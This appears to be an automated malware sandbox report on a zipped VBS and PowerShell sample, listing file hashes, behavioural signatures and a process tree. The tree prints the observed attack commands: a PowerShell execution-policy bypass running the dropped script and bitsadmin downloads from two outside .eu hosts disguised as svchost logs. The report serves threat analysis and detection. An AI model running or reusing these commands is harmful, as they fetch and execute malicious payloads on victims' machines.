Overview
overview
10Static
static
1ckJTQEOKC_...zip.7z
windows7-x64
1ckJTQEOKC_...zip.7z
windows10-2004-x64
10ckJTQEOKC_...24.zip
windows7-x64
1ckJTQEOKC_...24.zip
windows10-2004-x64
1ckJTQEOKC\...ge.log
windows7-x64
1ckJTQEOKC\...ge.log
windows10-2004-x64
1ckJTQEOKC\...ge.log
windows7-x64
1ckJTQEOKC\...ge.log
windows10-2004-x64
1ckJTQEOKC\...PH.vbs
windows7-x64
1ckJTQEOKC\...PH.vbs
windows10-2004-x64
1ckJTQEOKC\...PH.ps1
windows7-x64
10ckJTQEOKC\...PH.ps1
windows10-2004-x64
10ckJTQEOKC\darm.chh
windows7-x64
3ckJTQEOKC\darm.chh
windows10-2004-x64
3ckJTQEOKC\lite.chh
windows7-x64
3ckJTQEOKC\lite.chh
windows10-2004-x64
3ckJTQEOKC\msedge.log
windows7-x64
1ckJTQEOKC\msedge.log
windows10-2004-x64
1Analysis
-
max time kernel
259s -
max time network
256s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 21:26
Static task
static1
Behavioral task
behavioral1
Sample
ckJTQEOKC_28_11_2024.zip.7z
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ckJTQEOKC_28_11_2024.zip.7z
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
ckJTQEOKC_28_11_2024.zip
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
ckJTQEOKC_28_11_2024.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
ckJTQEOKC\0_msedge.log
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
ckJTQEOKC\0_msedge.log
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
ckJTQEOKC\1_msedge.log
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
ckJTQEOKC\1_msedge.log
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
ckJTQEOKC\WdxzhJPH.vbs
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
ckJTQEOKC\WdxzhJPH.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
ckJTQEOKC\WdxzhJPH.ps1
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
ckJTQEOKC\WdxzhJPH.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
ckJTQEOKC\darm.chh
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
ckJTQEOKC\darm.chh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
ckJTQEOKC\lite.chh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
ckJTQEOKC\lite.chh
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
ckJTQEOKC\msedge.log
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
ckJTQEOKC\msedge.log
Resource
win10v2004-20241007-en
General
-
Target
ckJTQEOKC_28_11_2024.zip.7z
-
Size
27KB
-
MD5
28392dc4be3ecbc57953c605981affdc
-
SHA1
fa897706e7e4ade0d35a3e2f6d0637c897fef777
-
SHA256
2da77359f85bbc09c5ea5a4dd2f768e16079bbff9ae22a7cf84e4411bd65d1cb
-
SHA512
e519bff9d5f41e519dba9e0d31dbc020f0b61b2157533becf8ee0508577a31f8fa6075e7f7d41566346751578a7a32967a62ad166da9cf47c1383bd943cc2a69
-
SSDEEP
768:wqRsZXvxy2Wwbmqd1hBv4yUevPXp+9NaP996:wqRs5FWwbmq3bZPXp+9N
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2040 3580 bitsadmin.exe 115 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 3580 bitsadmin.exe 115 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2040 bitsadmin.exe 5104 bitsadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid Process 4592 notepad.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid Process 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid Process 428 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
7zFM.exepowershell.exedescription pid Process Token: SeRestorePrivilege 428 7zFM.exe Token: 35 428 7zFM.exe Token: SeSecurityPrivilege 428 7zFM.exe Token: SeSecurityPrivilege 428 7zFM.exe Token: SeDebugPrivilege 4584 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
7zFM.exepid Process 428 7zFM.exe 428 7zFM.exe 428 7zFM.exe 428 7zFM.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 4584 wrote to memory of 4924 4584 powershell.exe 117 PID 4584 wrote to memory of 4924 4584 powershell.exe 117 PID 4584 wrote to memory of 684 4584 powershell.exe 121 PID 4584 wrote to memory of 684 4584 powershell.exe 121
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC_28_11_2024.zip.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:428
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5092
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"1⤵PID:2444
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1"1⤵
- Opens file in notepad (likely ransom note)
PID:4592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1'"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:4924
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:684
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer mBqCIf /priority FOREGROUND "https://ghryj.eu/post//7e3210e6d8b2a6a7e2282c08bd060468.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2040
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer caAxKn /priority FOREGROUND "https://uhfb.eu/post//7e3210e6d8b2a6a7e2282c08bd060468.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:5104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5fb2d4b4538f231805a677bf1fdae7618
SHA19af3e31cad8f69e7d61f81005f8d7bb615ceea05
SHA25607bd6fa0bfb02d25cb31d8d9bb31653912671394c0fb1e8b10296682448627f2
SHA512d2fecf45f070e5cd752afdc6b229ffe6027ee12c726e98cc867ceb19990f964cd084de24312530c9d65a9b7ad7ad51d3d9a82c444d56a5a8cb78d65a636b6f05
-
Filesize
32B
MD5c5f79e50e9f1426aed3a210a3a5e8c4d
SHA17c8dfd39f669d241205219f066a022e028749d8e
SHA25689e9165ac6d056ca646a831e17d0c0f8877a7ebc9adba1665be6a6b60d9636aa
SHA51220ac36e6a588077a038c894ebc0bd53966210b94706674e8ebc5e852463123c7f6a1255769949c29e70e4c75d179af3dfc77501cd5c7c3d6fbf0d92453074d41
-
Filesize
2KB
MD59d6d8a084805bbf5d22507780d14e8f4
SHA127ebc6c5948855d6b5a7f1c5422a3be6a4a1e77a
SHA2569092a282a5c56c0a19713fd3067b528efae5b27e9faa737c87a9bbf6a566cc5e
SHA512a8142d16469fb415ad3f9212d52f0aadde797876e7735f3faebd79b57acd04688726e83047c808851ea9394b14dca0dad8c33a1e7695c4ce2a768d46a2f3597b
-
Filesize
876B
MD5fd4e455ea3f14f99f5f9b66b4e0ef6d9
SHA1001bf670b7c829cb9d0ffb82a13ff2a65b1cb969
SHA2561cc49c3a3e3d7af8deea30253f7f0b2486b6de8f51c7ab1b420b22f5918005fc
SHA512f9b228ce9358013b92db3803fc6c81d7badf3917d7814d36ee43885b548558c1fbb3e4658d6f2ce752331d51d79898060071d475617810b3103eec8f85320d3b
-
Filesize
1KB
MD56b831ce8380c693ee6070ad424c9f92b
SHA1b87e2ef196383c246b996c4764e328d523b5c5b7
SHA256a65d23c0df6c750741bb63dee3564ea44462a07050f54a3b585d2c0c4b943e35
SHA512d333149446bd5e83310037b293b1cd73d3a2a15fa9b10ccbcda5fcac70b67e53e86aea4b7c7e0f567106ba3ca45c9856ccc69db7fd75b2d272397e92abf503e4
-
Filesize
95KB
MD5960716f6d0c819d551f68b970faff1f9
SHA1f23ca0bafec43bd8ba899190d290ab9db97b7b07
SHA256a83be5df3bb0b2b83a3727b50d0ebd74b8d0ef425a29f1352095260e12569192
SHA51250fc39e4a1d3cb91ebc76dfe1eaf5f32fb4871957d57d67c0bbde29dd0f97412f945db442a4f95b3b7f69f1148fe68df7f76621493ad64f742052b333fbe5f25
-
Filesize
16B
MD549fa9b3510c1cbf6d6df2f4a2f9f8e65
SHA13c1c22697e4370100ef87a52084d7c14fbf657d3
SHA256fcbccd7b328d9270a0f3820ecf622f6e14c09df6061f2275cb9524673b681acf
SHA5128870d64fb90035f6a8735c1bc8452ef516fd26de8472bdd4fc2e8d23a1a4b65566e954b1e3711a460ece543325389a487fdfc5ac477af8617b658e930ffd721f